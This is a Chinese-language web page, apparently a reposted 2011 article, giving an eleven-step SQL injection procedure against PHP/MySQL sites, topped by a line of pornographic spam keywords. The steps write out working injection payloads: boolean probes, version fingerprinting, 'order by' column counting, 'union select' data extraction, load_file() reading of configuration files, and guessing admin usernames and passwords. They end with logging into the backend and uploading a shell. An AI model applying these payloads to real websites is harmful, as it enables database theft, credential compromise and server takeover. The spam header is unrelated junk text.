欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

php注入基本步驟小結(jié)

  發(fā)布時(shí)間:2011-04-01 00:43:02   作者:佚名   我要評論
php注入基本步驟小結(jié),我們在編寫代碼的時(shí)候一定要注意注入點(diǎn)。
php注入十點(diǎn)基本步驟

1、判斷是否存在注入,加'、and 1=1、and 1=2

2、判斷版本and ord(mid(version(),1,1))>51/* 返回正常說明是4.0以上版本,可以用union查詢

3、利用order by 暴字段,在網(wǎng)址后加 order by 10/* 如果返回正常說明字段大于10

4、再利用union來查詢準(zhǔn)確字段,如: and 1=2 union select 1,2,3,......./* 直到返回正常報(bào)出數(shù)字,說明猜到準(zhǔn)確字段數(shù)。如過濾了空格可以用/**/代替。

(可在分別用user()、database()、version()進(jìn)行替換報(bào)出的數(shù)字進(jìn)而查看信息)

5、判斷數(shù)據(jù)庫連接帳號有沒有寫權(quán)限,and (select count(*) from mysql.user)>0/* 如果結(jié)果返回錯(cuò)誤,那我們只能猜解管理員帳號和密碼了。

6、如果返回正常,則可以通過and 1=2 union select 1,2,3,4,5,6,load_file(char(文件路徑的ascii值,用逗號隔開)),8,9,10 /* 注:load_file(char(文件路徑的ascii值,用逗號隔開))也可以用十六進(jìn)制,通過這種方式讀取配置文件,找到數(shù)據(jù)庫連接等。

7、首先猜解user表,如: and 1=2 union select 1,2,3,4,5,6....from user/* 如果返回正常,說明存在這個(gè)表。

8、知道了表就猜解字段,and 1=2 union select 1,username,3,4,5,6....from user/* 按報(bào)出的數(shù)字進(jìn)行替換

9、同理再猜解password字段,猜解成功再找后臺登錄。

10、登錄后臺,上傳shell。

11、檢測是不是root權(quán)限 and/**/ord(mid(user(),1,1))=114/*

相關(guān)文章

最新評論